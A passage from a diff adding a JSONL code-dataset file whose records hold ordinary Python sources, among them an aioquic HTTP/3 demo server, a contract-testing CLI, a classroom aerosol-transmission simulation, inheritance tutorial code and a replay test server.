diff --git "a/1699.jsonl" "b/1699.jsonl" new file mode 100644--- /dev/null +++ "b/1699.jsonl" @@ -0,0 +1,1616 @@ +{"seq_id":"42462175928","text":"#\n# demo application for http3_server.py\n#\n\nimport datetime\nimport os\nfrom urllib.parse import urlencode\n\nimport httpbin\nfrom asgiref.wsgi import WsgiToAsgi\nfrom starlette.applications import Starlette\nfrom starlette.responses import PlainTextResponse, Response\nfrom starlette.routing import Mount, Route, WebSocketRoute\nfrom starlette.staticfiles import StaticFiles\nfrom starlette.templating import Jinja2Templates\nfrom starlette.types import Receive, Scope, Send\nfrom starlette.websockets import WebSocketDisconnect\n\nROOT = os.path.dirname(__file__)\nSTATIC_ROOT = os.environ.get(\"STATIC_ROOT\", os.path.join(ROOT, \"htdocs\"))\nSTATIC_URL = \"/\"\nLOGS_PATH = os.path.join(STATIC_ROOT, \"logs\")\nQVIS_URL = \"https://qvis.quictools.info/\"\n\ntemplates = Jinja2Templates(directory=os.path.join(ROOT, \"templates\"))\n\n\nasync def homepage(request):\n \"\"\"\n Simple homepage.\n \"\"\"\n await request.send_push_promise(\"/style.css\")\n return templates.TemplateResponse(\"index.html\", {\"request\": request})\n\n\nasync def echo(request):\n \"\"\"\n HTTP echo endpoint.\n \"\"\"\n content = await request.body()\n media_type = request.headers.get(\"content-type\")\n return Response(content, media_type=media_type)\n\n\nasync def logs(request):\n \"\"\"\n Browsable list of QLOG files.\n \"\"\"\n logs = []\n for name in os.listdir(LOGS_PATH):\n if name.endswith(\".qlog\"):\n s = os.stat(os.path.join(LOGS_PATH, name))\n file_url = \"https://\" + request.headers[\"host\"] + \"/logs/\" + name\n logs.append(\n {\n \"date\": datetime.datetime.utcfromtimestamp(s.st_mtime).strftime(\n \"%Y-%m-%d %H:%M:%S\"\n ),\n \"file_url\": file_url,\n \"name\": name[:-5],\n \"qvis_url\": QVIS_URL\n + \"?\"\n + urlencode({\"file\": file_url})\n + \"#/sequence\",\n \"size\": s.st_size,\n }\n )\n return templates.TemplateResponse(\n \"logs.html\",\n {\n \"logs\": sorted(logs, key=lambda x: x[\"date\"], reverse=True),\n \"request\": request,\n },\n )\n\n\nasync def padding(request):\n \"\"\"\n Dynamically generated data, maximum 50MB.\n \"\"\"\n size = min(50000000, request.path_params[\"size\"])\n return PlainTextResponse(\"Z\" * size)\n\n\nasync def ws(websocket):\n \"\"\"\n WebSocket echo endpoint.\n \"\"\"\n if \"chat\" in websocket.scope[\"subprotocols\"]:\n subprotocol = \"chat\"\n else:\n subprotocol = None\n await websocket.accept(subprotocol=subprotocol)\n\n try:\n while True:\n message = await websocket.receive_text()\n await websocket.send_text(message)\n except WebSocketDisconnect:\n pass\n\n\nasync def wt(scope: Scope, receive: Receive, send: Send) -> None:\n \"\"\"\n WebTransport echo endpoint.\n \"\"\"\n # accept connection\n message = await receive()\n assert message[\"type\"] == \"webtransport.connect\"\n await send({\"type\": \"webtransport.accept\"})\n\n # echo back received data\n while True:\n message = await receive()\n if message[\"type\"] == \"webtransport.datagram.receive\":\n await send(\n {\n \"data\": message[\"data\"],\n \"type\": \"webtransport.datagram.send\",\n }\n )\n elif message[\"type\"] == \"webtransport.stream.receive\":\n await send(\n {\n \"data\": message[\"data\"],\n \"stream\": message[\"stream\"],\n \"type\": \"webtransport.stream.send\",\n }\n )\n\n\nstarlette = Starlette(\n routes=[\n Route(\"/\", homepage),\n Route(\"/{size:int}\", padding),\n Route(\"/echo\", echo, methods=[\"POST\"]),\n Mount(\"/httpbin\", 
WsgiToAsgi(httpbin.app)),\n Route(\"/logs\", logs),\n WebSocketRoute(\"/ws\", ws),\n Mount(STATIC_URL, StaticFiles(directory=STATIC_ROOT, html=True)),\n ]\n)\n\n\nasync def app(scope: Scope, receive: Receive, send: Send) -> None:\n if scope[\"type\"] == \"webtransport\" and scope[\"path\"] == \"/wt\":\n await wt(scope, receive, send)\n else:\n await starlette(scope, receive, send)\n","repo_name":"aiortc/aioquic","sub_path":"examples/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","stars":1417,"dataset":"github-code","pt":"52"} +{"seq_id":"33322653358","text":"from dataclasses import dataclass\nfrom typing import AsyncGenerator, Generic, TypeVar\n\nfrom nonebot.adapters.onebot.v11 import MessageSegment\n\nT = TypeVar(\"T\", bound=\"Music\", covariant=True)\n@dataclass\nclass SearchResult(Generic[T]):\n count: int\n musics: AsyncGenerator[T, None]\n\n\n@dataclass\nclass Music:\n name: str\n artists: str\n album: str\n vip: bool\n\n async def segment(self) -> MessageSegment:\n raise NotImplementedError\n\n @staticmethod\n async def from_id(id: str) -> MessageSegment:\n raise ValueError(\"This source does not support fetching by ID\")\n\n @staticmethod\n async def search(keyword: str, page_size: int) -> SearchResult[\"Music\"]:\n raise NotImplementedError\n","repo_name":"su226/IdhagnBot","sub_path":"plugins/music/sources/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"16376164373","text":"import numpy as np\n\ndef predict_class(model, data, label_dict):\n prediction = model.predict(data)\n prediction = np.where(prediction == np.amax(prediction))\n\n key = prediction[1][0]\n label = label_dict.get(key)\n\n return label\n\ndef predict_confidence(model, data, label_dict):\n prediction = model.predict(data)[0]\n prediction = np.round(prediction * 100, 3)\n\n class_pred = list(zip(label_dict.values(), prediction))\n\n return class_pred","repo_name":"AbdulAhadKhan/fetal-biometry-detection","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69890787686","text":"import logging\nimport os\nimport os.path\nimport sys\n\nimport click\nimport nose\nimport simplejson as json\n\nfrom pacte import contract_factory\nfrom pacte.case_builder import http_case_factory\nfrom pacte.contract import Contract\nfrom pacte.exceptions import PacteServiceException\nfrom pacte.states import load_states\nfrom pacte.utils.json import datetime_decoder\n\nlogger = logging.getLogger('pacte.pact')\nPROVIDER_TEST_RESULT = 'nosetests-ctp.xml'\nCONSUMER_TEST_RESULT = 'nosetests-ctc.xml'\n\n\ndef _exit(successful):\n if successful:\n sys.exit(0)\n sys.exit(1)\n\n\ndef _render_http_testsuite(app, contracts, states):\n provider_testcases = []\n for contract in contracts:\n for interaction in contract.interactions:\n state_cls = states.get(interaction.provider_state)\n if not state_cls:\n raise PacteServiceException('State \"%s\" is not prepared' % interaction.provider_state)\n provider_testcases.append(http_case_factory(app, state_cls, interaction, contract.consumer)())\n return provider_testcases\n\n\n@click.command()\n@click.option('--statedir', help='Directory for state preparation scripts. 
Defaults to \"tests/contract/provider\"',\n default='tests/contract/provider')\n@click.option(\n '--app', help='The Flask application instance. Defaults to \"app.app\"', default='app.app'\n)\n@click.argument(\n 'contract', type=click.Path(exists=True),\n)\ndef provider(statedir, app, contract):\n if os.path.exists(PROVIDER_TEST_RESULT):\n os.remove(PROVIDER_TEST_RESULT)\n if not os.path.exists(contract):\n logger.error('Contract file %s does not exist', contract)\n sys.exit(1)\n contracts = []\n if os.path.isdir(contract):\n for dirpath, dirnames, filenames in os.walk(contract):\n for filename in filenames:\n with open(os.path.join(dirpath, filename)) as f:\n contract = Contract.from_dict(json.loads(f.read(), object_pairs_hook=datetime_decoder))\n contracts.append(contract)\n else:\n with open(contract) as f:\n contract = Contract.from_dict(json.loads(f.read(), object_pairs_hook=datetime_decoder))\n contracts.append(contract)\n if not contracts:\n logger.info('No contract found')\n sys.exit()\n\n states = load_states(statedir)\n # It's important to provide all test cases in a list so that nosetests can\n # generate a proper xunit result summary file.\n test_cases = _render_http_testsuite(app, contracts, states)\n successful = nose.run(\n argv=[__file__, '-sv', '--logging-level=INFO', '--with-xunit', '--xunit-file=' + PROVIDER_TEST_RESULT],\n suite=test_cases,\n )\n _exit(successful)\n\n\n@click.command()\n@click.option(\n '--pact',\n help='Path to the directory to save contract files. It will be created if not exists. Defaults to \".pact\"',\n default='.pact'\n)\n@click.option(\n '--contract',\n help='Path to the consumer contract tests. Defaults to \"tests/contract/consumer\"',\n default='tests/contract/consumer'\n)\ndef consumer(pact, contract):\n if os.path.exists(CONSUMER_TEST_RESULT):\n os.remove(CONSUMER_TEST_RESULT)\n if not os.path.exists(contract):\n logger.warn('Contract file %s does not exist', contract)\n sys.exit() # exit with success, to be compatible with services with no provider state prepared\n contract_factory.reset_factory(pact)\n successful = nose.run(argv=[__file__, '-sv', '--with-xunit', '--xunit-file=' + CONSUMER_TEST_RESULT, contract])\n contract_factory.serialize(pact)\n _exit(successful)\n","repo_name":"hellmage/pacte","sub_path":"pacte/pact.py","file_name":"pact.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43520577772","text":"# import\nimport json\nfrom os import O_TEMPORARY\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport seaborn as sns\nimport math \nfrom src.classroom import *\nfrom src.infection import *\n\ndef load_parameters_av(filepath):\n '''\n Loads input and output directories\n\n Handles script running anywhere (terminal/notebook/etc...)\n '''\n try:\n with open(filepath) as fp:\n parameter = json.load(fp)\n except:\n try:\n with open('../' + filepath) as fp:\n parameter = json.load(fp)\n except:\n with open('../../' + filepath) as fp:\n parameter = json.load(fp)\n return parameter\n\nclass user_viz():\n '''\n simulation class that holds bulk of vars and functions\n\n :function init:\n :function load_parameters:\n :function merv_to_eff:\n :function generate_class_seating:\n :function model_run:\n \n '''\n def __init__(self, targets, parent=None):\n '''\n Generate local instance of room based on user and default inputs\n\n ToDo list:\n Improve Seating Chart and assignment for n 
students\n More classroom customization\n\n :param targets:\n '''\n super(user_viz, self).__init__()\n\n self.input_params = targets\n # for i in self.input_params:\n # print(i, self.input_params[i])\n\n # Simulation Parameters\n self.room_type = self.input_params['room_type']\n self.n_students = self.input_params['num_students']\n self.n_initial_students = self.input_params['num_initial']\n self.n_adults = self.input_params['num_adults']\n self.n_sims = self.input_params['n_sims']\n self.age_group = self.input_params['age_group']\n self.mins_per_class = self.input_params['mins_per_class']\n self.classes_per_day = self.input_params['classes_per_day']\n self.days_per_simulation = self.input_params['days_per_simulation']\n self.well_mixed_room = self.input_params['well_mixed_room']\n self.ventilation = self.input_params['ventilation']\n\n # Human Parameters\n self.mean_breathing_rate = self.input_params['breathing_rate']\n self.respiratory_activity = self.input_params['respiratory_activity']\n self.student_mask_percent = self.input_params['student_mask_percent']\n self.adult_mask_percent = self.input_params['adult_mask_percent']\n self.mask_protection_rate = self.input_params['mask_protection_rate']\n\n # Room Parameters\n if self.input_params['floor_area'] == 0:\n if self.room_type == 'small':\n self.floor_area = 900\n elif self.room_type == 'large':\n self.floor_area = 2000\n else:\n print('Please select Valid Room Type... Defaulting to small classroom')\n else:\n self.floor_area = self.input_params['floor_area']\n\n self.room_height = self.input_params['room_height']\n self.vent_size = self.input_params['vent_size']\n self.vent_locations = self.input_params['vent_locations']\n self.window_size = self.input_params['window_size']\n self.window_locations = self.input_params['window_locations']\n self.door_size = self.input_params['door_size']\n self.door_location = self.input_params['door_locations']\n self.seating_chart = self.input_params['seating_chart']\n\n # Vent Parameters\n # ACH is outdoor air_exchange-rate\n if self.input_params['ach_level'] == 0:\n if self.ventilation == 'Closed Windows':\n self.air_exchange_rate = 0.3 # TESTING for self.ventilation closed\n elif self.ventilation== 'Open Windows':\n self.air_exchange_rate = 2\n elif self.ventilation=='Mechanical':\n self.air_exchange_rate= 5\n elif self.ventilation=='Open Windows and Fans':\n self.air_exchange_rate = 6\n elif self.ventilation=='Better Mechanical':\n self.air_exchange_rate= 9\n elif self.ventilation=='Outdoors':\n self.air_exchange_rate= 20\n else:\n print('ERROR in setting ACH... 
Defaulting to 6 (Open Windows and Fans)')\n self.air_exchange_rate = 6\n else:\n self.air_exchange_rate = self.input_params['ach_level']\n \n \n self.merv_level = self.input_params['merv_level']\n self.recirc_rate = self.input_params['recirc_rate']\n self.relative_humidity = self.input_params['relative_humidity']\n self.primary_outdoor_air_fraction = self.input_params['primary_outdoor_air_fraction']\n\n # Advanced Parameters\n self.strain = self.input_params['strain']\n self.crit_drop_radius = self.input_params['crit_droplet_radius']\n self.viral_deact_rate = self.input_params['viral_deact_rate']\n self.immunity_rate = self.input_params['immunity_rate']\n self.child_vax_rate = self.input_params['child_vax_rate']\n self.adult_vax_rate = self.input_params['adult_vax_rate']\n self.viral_infectivity = self.input_params['viral_infectivity']\n if self.input_params['merv_level'] == 0:\n self.aerosol_filtration_eff = self.input_params['aerosol_filtration_eff']\n else:\n print('aerosol filtration derived from MERV level')\n # TODO: add default value for this based on MERV level\n self.aerosol_filtration_eff = 0.06 / self.merv_level # default value\n\n self.output_filepath = \"output/\"\n\n def load_parameters(self, filepath):\n '''\n Loads a JSON parameter file, retrying from parent directories\n\n :param filepath: path of json file to load\n '''\n # print(os.getcwd(), 'av_cwd')\n try:\n with open(filepath) as fp:\n parameter = json.load(fp)\n except:\n try:\n with open('../' + filepath) as fp:\n parameter = json.load(fp)\n except:\n with open('../../' + filepath) as fp:\n parameter = json.load(fp)\n\n return parameter\n\n def merv_to_eff(self):\n '''\n Convert MERV level to a filtration efficiency for the critical droplet radius\n\n TODO: use effective drop radius not critical radius\n\n :return: filtration efficiency for droplets at the critical radius\n '''\n\n\n merv_dict = [\n {'merv': 1, '0.3-1': 0.01, '1-3': 0.01, '3-10': 0.01},\n {'merv': 2, '0.3-1': 0.01, '1-3': 0.01, '3-10': 0.01},\n {'merv': 3, '0.3-1': 0.01, '1-3': 0.01, '3-10': 0.01},\n {'merv': 4, '0.3-1': 0.01, '1-3': 0.01, '3-10': 0.01},\n {'merv': 5, '0.3-1': 0.01, '1-3': 0.01, '3-10': 0.2},\n {'merv': 6, '0.3-1': 0.01, '1-3': 0.01, '3-10': 0.35},\n {'merv': 7, '0.3-1': 0.01, '1-3': 0.01, '3-10': 0.50},\n {'merv': 8, '0.3-1': 0.01, '1-3': 0.20, '3-10': 0.70},\n {'merv': 9, '0.3-1': 0.01, '1-3': 0.35, '3-10': 0.75},\n {'merv': 10, '0.3-1': 0.01, '1-3': 0.50, '3-10': 0.80},\n {'merv': 11, '0.3-1': 0.2, '1-3': 0.65, '3-10': 0.85},\n {'merv': 12, '0.3-1': 0.35, '1-3': 0.80, '3-10': 0.90},\n {'merv': 13, '0.3-1': 0.50, '1-3': 0.85, '3-10': 0.90},\n {'merv': 14, '0.3-1': 0.75, '1-3': 0.90, '3-10': 0.95},\n {'merv': 15, '0.3-1': 0.85, '1-3': 0.90, '3-10': 0.95},\n {'merv': 16, '0.3-1': 0.95, '1-3': 0.95, '3-10': 0.95},\n {'merv': 17, '0.3-1': 0.9997, '1-3': 0.9997, '3-10': 0.9997},\n {'merv': 18, '0.3-1': 0.99997, '1-3': 0.99997, '3-10': 0.99997},\n {'merv': 19, '0.3-1': 0.999997, '1-3': 0.999997, '3-10': 0.999997},\n {'merv': 20, '0.3-1': 0.9999997, '1-3': 0.9999997, '3-10': 0.9999997},\n ]\n if self.merv_level == 0:\n return 0\n eff = 0\n merv = np.floor(min(max(self.merv_level, 1), 20)) # clamp MERV to the 1-20 range covered by the table\n for item in merv_dict:\n if item['merv'] == merv:\n if self.crit_drop_radius < 1:\n eff = item['0.3-1']\n elif self.crit_drop_radius < 3:\n eff = item['1-3']\n else:\n eff = item['3-10']\n\n return eff\n\n def generate_class_seating(self):\n '''\n Based on:\n - class type\n - seating chart\n - number of students\n - number of adults\n \n Return dict of student_id: [x, y] for a good seating chart\n \n grid = .2 -> .8\n\n '''\n # square room ezpz\n max_width = 
int(self.floor_area / 10)\n min_width = 5\n max_length = int(self.floor_area / 10 - 10) # teacher in blank space\n min_length = 5\n num_seats_each_way = int(math.ceil(max_width / math.sqrt(self.n_students)))\n\n # create seats based on class type and seating chart\n if self.seating_chart == 'grid':\n x_s = [x for x in range(min_width, max_width + 1, num_seats_each_way)]\n y_s = [y for y in range(min_length, max_length + 1, num_seats_each_way)]\n x_y_combo = [(x, y) for x in x_s for y in y_s]\n seats = {}\n for i in range(self.n_students):\n seats[i] = x_y_combo[i]\n elif self.seating_chart == 'circular':\n pass\n else:\n print('please enter valid seating')\n pass\n print(seats)\n return seats\n\n # function to run model with user input\n def model_run(self):\n '''\n Updated 7/7/21 with _bus code\n\n 1 SETUP\n 2 LOADING\n 3 CONCENTRATION\n 4 MASK HISTOGRAM\n 5 AIRFLOW HISTOGRAM\n 6 SCATTER\n 7 RISK VS TIME\n\n Sim Variables\n class_arguments = {\n :param n_students: number of students in each sim\n :param n_initial: number of initial infected students \n :param n_adults: number of adults in each sim\n :param mask: likelihood of student having mask\n :param n_sims: number of simulations with new initial students \n :param duration_mins_step: time step in minutes\n :param duration_steps_day: number of steps in a day\n :param duration_days_sim: number of days to simulate \n :param seating_chart: (x,y) locations for student seating\n }\n v_d_arguments = {\n :param window_locations: (x,y,z) of window locations\n :param window_size: surface area of window\n :param vent_locations: (x,y,z) of vent locations\n :param vent_size: surface area of vent\n :param door_locations: (x,y,z) of door locations\n :param door_size: surface area of door\n :param air_exchange_rate: ACH exchange rate of air between room and outside\n }\n :param aerosol_t_rate: aerosol transmission rate\n\n :return:\n '''\n # update 7/18 \n # 0 Variables\n # Calculated parameters\n \n\n # 1 SETUP + CALCULATED VARIABLES\n input_args = {\n 'floor_area': self.floor_area,\n 'room_height': self.room_height,\n 'air_exchange_rate': self.air_exchange_rate,\n 'breathing_flow_rate': self.mean_breathing_rate,\n 'aerosol_filtration_eff': self.aerosol_filtration_eff,\n 'relative_humidity': self.relative_humidity,\n 'exhaled_air_inf': self.viral_infectivity,\n 'max_viral_deact_rate': self.viral_deact_rate,\n 'mask_passage_prob': self.mask_protection_rate,\n 'max_aerosol_radius': self.crit_drop_radius,\n 'primary_outdoor_air_fraction': self.primary_outdoor_air_fraction\n }\n\n self.baseline_srt = return_aerosol_transmission_rate(input_args)\n\n self.seats = self.generate_class_seating()\n sim_arguments = {\n 'n_students': self.n_students,\n 'n_initial': self.n_initial_students,\n 'n_adults': self.n_adults,\n 'student_mask_percent': self.student_mask_percent,\n 'adult_mask_percent': self.adult_mask_percent,\n 'n_sims': self.n_sims,\n 'mins_per_class': self.mins_per_class,\n 'classes_per_day': self.classes_per_day,\n 'days_per_simulation': self.days_per_simulation,\n 'seats': self.seats,\n 'floor_area': self.floor_area\n }\n v_d_arguments = {\n 'window_locations': self.window_locations,\n 'window_size': self.window_size,\n 'vent_locations': self.vent_locations,\n 'vent_size': self.vent_size,\n 'door_location': self.door_location,\n 'door_size': self.door_size,\n 'air_exchange_rate': self.air_exchange_rate\n }\n\n # 2 USER SIMULATIONS\n param_dict, output_df = classroom_simulation(sim_arguments, v_d_arguments, wmr=self.well_mixed_room, 
base_srt=self.baseline_srt)\n print('output df columns', output_df.columns)\n\n output_df.to_csv(self.output_filepath + 'sim_data.csv', index=False)\n # return param_dict, output_df\n # 3 DENSITY ESTIMATION OF /STEP TRANSMISSION RATE\n\n # out of practice!!!!\n\n plt.figure(figsize=(10, 10))\n density_df = output_df.copy()\n density_plot = density_df.groupby(['Day #', 'Step #', 'Minute #'])['Transmission by Minute'].mean()\n plt.hist(density_plot)\n\n density_filename = self.output_filepath + 'density_plot.png'\n plt.savefig(density_filename, dpi=300)\n\n\n # 4 MASK HISTOGRAM\n\n # make the plots from the dataframe!!!!\n\n # 5 AIRFLOW HISTOGRAM\n\n # 6 SCATTER LRT vs SRT vs CRT\n # infection rate vs distance\n # infections rate avg vs time\n # infection boundary of time vs distance\n\n # range_test_plot = density_\n\n # 7 RISK VS TIME\n\n\n\n\n\n\n # # 1 SETUP\n # print('Model Setup...')\n\n # # class_sim()\n\n # # run class model\n # class_seating = self.generate_class_seating()\n\n # # seat var is room type\n # # make varying input setup for ventilation\n\n # class_trip, conc_array, out_mat, chance_nonzero = class_sim(n_students = int(self.students_var), mask = self.mask_var, n_sims = self.number_simulations, duration = self.duration, initial_seating = self.room_type, loc_params=temp_loc) # replace default with selected\n\n # ### Validate using chance_nonzero\n\n\n\n # self.chance_nonzero = chance_nonzero\n # # print(chance_nonzero, 'more than none?')\n # self.conc_array = conc_array\n # self.class_trips.append(class_trip)\n # # print('model_run start')\n # plt.figure(figsize=(5,4))#, dpi=300)\n # plt.gcf().set_size_inches(5,4)\n # # plt.gcf().set_size_inches(5,4)\n # # ax = plt.gca()\n # pd.Series(class_trip).plot.kde(lw=2, c='r')\n # plt.title('Density estimation of exposure')\n # # plt.xlim(0, .004)\n # # print(plt.xticks())\n\n # # set x ticks\n # temp_x = np.array(plt.xticks()[0])\n # str_x = np.array([str(round(int * 100, 2))+'%' for int in temp_x])\n # plt.xticks(temp_x, str_x)\n\n # plt.ticklabel_format(axis=\"x\")#, style=\"sci\", scilimits=(0,0))\n\n # plt.yticks(np.arange(0, 3500, 700), np.arange(0, 3500, 700) / 3500)\n\n # ##### This is temporary chill tf out ####\n # # rescale y axis to be % based\n # plt.xlabel('Likelihood of exposure to infectious dose of particles ')\n # plt.ylabel('Density estimation of probability of occurrence')\n # plt.savefig('results/window_curve.png', dpi=300)\n # # plt.show()\n # print('model_run complete!')\n\n # # temp variables\n # self.chance_nonzero = 0\n # self.conc_array = 0\n\n \n\n\n # # 2 LOADING\n # plt.figure()\n\n # if self.room_type == 'small':\n # self.seat_dict = load_parameters_av(filepath='config/small_classroom.json')\n # elif self.room_type == 'large':\n # self.seat_dict = load_parameters_av(filepath='config/large_classroom.json')\n # # implement SEATING CHART OPTIONS ############################\n\n # # 3 CONCENTRATION + 1\n\n # print('Plotting Concentration ...')\n # x_arr = []\n # y_arr = []\n # for i in self.seat_dict.items(): ################### change seating\n # x_arr.append(i[1][1])\n # y_arr.append(i[1][0] * 1.5 + 1) # seat fix\n # rot = mpl.transforms.Affine2D().rotate_deg(180)\n\n # # Set up Figure\n # fig, ax1 = plt.subplots()\n # plt.matshow(out_mat, cmap=\"OrRd\", norm=mpl.colors.LogNorm())\n # plt.gcf().set_size_inches(2,2)\n # plt.suptitle('Viral Concentration Heatmap', fontsize=7.5)\n # plt.axis('off')\n # plt.text(.1, .01, '\\nSample proxy for air flow after ' + str(self.duration) + ' minutes\\n', 
fontsize=4)\n # plt.savefig(output_filepath + '_concentration.png', dpi=300)\n # plt.close()\n\n # # 4 MASK HISTOGRAM\n\n # fig_mask, ax_mask = plt.subplots()\n # mask_values = [70, 80, 90, 100]\n # mask_legend = [str(i) + '%' for i in mask_values]\n # print('ml', mask_legend)\n\n # for mask_ in mask_values:\n # '''\n # Note: Masks as referred to here are in terms of face masks\n\n # coding 'masks' will be noted when used\n # '''\n # class_trip_mask, conc_array_mask_mask, out_mat_mask, chance_nonzero_mask = class_sim(n_students = int(self.students_var), mask = self.mask_var, n_sims = self.number_simulations, duration = self.duration, initial_seating = self.room_type, loc_params=temp_loc) # replace default with selected\n\n\n # sns.distplot(list(class_trip_mask[2].values()), ax=ax_mask, rug=True, kde=False, hist_kws={\"histtype\": \"step\", \"linewidth\": 3, \"alpha\": 1})\n\n # fig_mask.savefig(output_filepath + '_masks.png', dpi=300)\n\n # 5 AIRFLOW HISTOGRAM\n\n\n\n # 6 SCATTER\n # 7 RISK VS TIME\n\n\n\n # print('Windows...')\n # fig2, ax2 = plt.subplots()\n # window_types = [0, 6]\n # win_out_df = pd.DataFrame(columns=window_types)\n # temp = 0.051\n # temp_step = 0.001\n\n # add dynamic x range ToDo\n #\n # for w in window_types:\n # bus_out_array, conc_array, out_mat, chance_nonzero, avg_mat = class_sim(int(self.students_var), self.mask_var, self.number_simulations, self.duration, self.seat_var, w) # WINDOW\n # x_range = [.051, .102, .153, .204]\n #\n # ## 7/4 TODO: why is it all going wrong\n #\n #\n # for i in range(len(x_range)):\n # if x_range[i] < max(bus_out_array[2].values()):\n # pass\n # else:\n # temp = x_range[i]\n # temp_step = 0.001 * (i + 1)\n\n\n # TODO: Check all values of KDE are positive\n\n # pd.Series(bus_out_array[2]).plot.kde(alpha=.5, ax=ax2)\n # pd.Series(bus_out_array[2]).plot.hist(alpha=.5, ax=ax2)\n\n ###############################################\n\n # SEABORN\n # sns.distplot(list(bus_out_array[2].values()), ax=ax2, rug=True, kde=False, hist_kws={\"histtype\": \"step\", \"linewidth\": 3, \"alpha\": 1})\n\n\n # fig2.legend(['Windows Closed', 'Windows Open 6 Inches'])\n # plt.xlabel('Mean likelihood of transmission at each step')\n # plt.ylabel('Number of students with this average risk of transmission')\n # seat_filepath_2 = output_filepath + '_windows.png'\n # fig2.savefig(seat_filepath_2, dpi=300)\n # plt.close(fig2)\n # print('Windows complete!')\n\n # Hist 3 Masks\n\n # print('Masks...')\n # fig3 = plt.figure(3)\n # mask_amount = [1, .9, .8, .7]\n # print('start masks')\n # colorlist = ['blue', 'green', 'yellow', 'red']\n # count_ = 0\n #\n # for m in mask_amount:\n # bus_out_array, conc_array, out_mat, chance_nonzero, avg_mat = class_sim(int(self.students_var), m, self.number_simulations, self.duration, self.seat_var, self.window_var) # SEATING\n # pd.Series(bus_out_array[2]).plot.hist(bins=np.arange(0, 0.056, 0.001), alpha=.5, color=colorlist[count_])\n # count_ += 1\n # plt.legend(['100% Mask compliance', '90% Mask compliance', '80% Mask compliance', '70% Mask compliance'])\n # plt.xlabel('Mean likelihood of transmission at each step')\n # plt.ylabel('Number of students with this average risk of transmission')\n # seat_filepath_3 = output_filepath + '_masks.png'\n # fig3.savefig(seat_filepath_3, dpi=300)\n # plt.close(fig3)\n # print('Masks complete!')\n\n\n\n # 5 SCATTER/KDE + 2\n\n\n\n\n # 6 T_RISK AVERAGE + 
1\n","repo_name":"covABM/GeoACT_Classroom","sub_path":"av.py","file_name":"av.py","file_ext":"py","file_size_in_byte":20909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31909160670","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n2020/10/23 10:18 乔誉萱\n\n类的继承:\n1、继承是为了重用已经存在的数据和行为,减少重复代码\n2、子类可以继承父类的所有实例属性和方法,实例属性是可选的,可以继承,也可以不继承\n3、子类继承父类的类属性是不可选的,默认继承\n4、当子类重写了父类的方法,子类调用的就是自己的方法,父类方法不再调用(执行顺序是先子后父,自下而上的)\n5、当子类没有重写父类方法,调用的则是父类方法(执行顺序是先父后子,自上而下)\n'''\n\n'''案例1:类的继承、实例属性的继承'''\nclass Father(object):\n\tdef property(self):\n\t\tprint('我是父类')\n\nclass Son(Father):\n\tdef __init__(self,age):\n\t\tself.age = age\n\t\n\tdef property(self):\n\t\tprint('我是子类,我{0}岁了'.format(self.age))\n\nclass GrandSon(Son):\n\t# 如果此孙类没用init实例化属性,在需要继承父类属性时直接[self.变量名]即可,无需写Son.__init__(self,age)\n\tdef __init__(self,age,sex):\n\t\tSon.__init__(self,age) # 继承父类实例化属性\n\t\tself.sex = sex\n\t\n\tdef property(self):\n\t\tprint('我是孙类,我{0}岁了,我是{1}'.format(self.age,self.sex))\n\n# 实例化父类\nf = Father()\nf.property()\n\n# 实例化子类\ns = Son(30)\ns.property()\n\n# 实例化孙类\ngs = GrandSon(8,'男生')\ngs.property()\n\n\n\n\n'''案例2:类属性的继承'''\nclass ChinaPerson(object):\n\tchina = '地球'\n\tprint(china)\n\nclass UsaPerson(ChinaPerson):\n\tpass\n\nu = UsaPerson() # 实例化类\nu.china # UsaPerson类可以直接调用Person类的类属性\n\n\n'''\n案例3:多个类的继承。\n1、遵循从左到右的原则,Son先去Mother类中找eat,若没有再去Father中找,若还没有则去Person中找\n(虽然没有继承Person,但Person是Father的父类,若在Father类中未找到则会去父类Person中找)\n2、被继承的父类是有书写顺序的,必须是从下到上,即下面案例中的Son子类若写成:class Son(Father,Mother),程序会报错\n'''\n\nclass Person(object):\n\tdef eat(self):\n\t\tprint('人都喜欢吃')\n\nclass Father(Person):\n\tdef eat(self):\n\t\tprint('爸爸喜欢吃肉')\n\nclass Mother(Father):\n\tdef eat(self):\n\t\tprint('妈妈喜欢吃菜')\n\n\nclass Son(Mother,Father): #被继承的父类必须遵从从下到上的书写顺序,若这里的先写Father再写Mother,程序会报错\n\tpass\n\ns=Son()\ns.eat()\n\n","repo_name":"qiaoyuxuan/python","sub_path":"Demo/testTemp/ClassDemo/class_inherit.py","file_name":"class_inherit.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7062542404","text":"import abc\nimport threading\nimport typing\nimport enum\nimport queue\n\n\nReceiver = typing.Callable[[object], None]\n\n\nclass Server(abc.ABC):\n\n @abc.abstractmethod\n def set_receiver(self, receiver: Receiver):\n raise NotImplementedError()\n\n @abc.abstractmethod\n def send(self, msg: object):\n raise NotImplementedError()\n\n\nclass Logger(abc.ABC):\n\n @abc.abstractmethod\n def log(self, msg: object):\n raise NotImplementedError()\n\n\nclass Direction(enum.Enum):\n SEND = 'send'\n RECEIVE = 'receive'\n\n\nclass ReplayError(Exception):\n \"\"\"Raised when a message is unexpected.\"\"\"\n\n\nclass ReplayRequestReply(threading.Thread, Server):\n\n def __init__(self, data):\n super(ReplayRequestReply, self).__init__()\n self._data = data\n self.index = 0\n self.q = queue.Queue()\n self.daemon = True\n self._receiver = None\n\n def set_receiver(self, receiver: Receiver):\n self._receiver = receiver\n\n def send(self, msg: object):\n self.q.put(msg)\n\n def run(self):\n while True:\n msg = self.q.get()\n if self.index >= len(self._data[Direction.SEND]):\n raise ReplayError(repr(msg))\n\n if self._data[Direction.SEND][self.index] != msg:\n raise ReplayError(repr(msg))\n\n if 